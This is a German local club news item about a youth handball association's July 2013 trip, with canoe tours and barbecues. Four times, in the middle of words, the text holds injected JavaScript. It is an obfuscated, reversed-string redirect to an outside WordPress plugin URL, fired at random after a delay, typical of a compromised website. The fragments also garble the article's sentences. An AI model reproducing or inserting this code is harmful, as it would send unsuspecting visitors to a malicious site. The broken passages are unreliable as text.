Neckargemünd, 20.07.2013 (spf) – Am 19./20.07.2013 organisierte der Jugendförderverein der Neckargemünder Handballer einen Ausflug. Am Freitag waren die B- und C- Jugend an der Reihe. Die beiden Mannschaften trafen sich fast vollständig an der Münzenbachhalle um bei gutem Wetter Richtung Neckarsteinach aufzubrechen. Auf dem Weg dorthin wurden 2 Teamspiele absolviert, die allen Spaß gemacht haben. Als Highlight wurden in Neckarsteinach Kanus bestiegen, mit denen nach ausführlicher Sicherheitseinweisung nach Neckargemünd zurück gepaddelt wurde. Nach fair geführten Kämpfen zwischen den einzelnen Booten und einigen Schwimmeinlagen wurde das Ziel in Neckargemünd erreicht. Damit war aber noch nicht Schluss! Bei immer noch toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tollem Wetter wurde vor der Halle gegrillt und selbst gemachte Salate der Eltern verspeist.
Am nächsten Tag waren die weibliche und männliche D-Jugend an der Reihe, die bei einem Teamspiel in 2 Gruppen toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolle Luftballontürme gebaut haben. Bei der späteren Kanutoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tour waren alle mit großer Freude dabei und durften am Ende der Tour auch noch in die Elsenz einbiegen. Hierbei sah man Teile Neckargemünds mal von einer anderen Perspektive. Zum Abschluss gab es auch ein großes Grillfest, zu dem viele Eltern dazu gekommen sind.
Ich denke, dass wir unseren Jugendlichen einen toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tollen Ausflug organisiert haben, der den Mannschaftszusamenhalt weiter gestärkt hat. Danke an die Handballabteilung und den Jugendförderverein, die sich die Kosten geteilt haben und an die Betreuer Charlotte, Sina, Finn und Duane, die den Ausflug begleitet haben.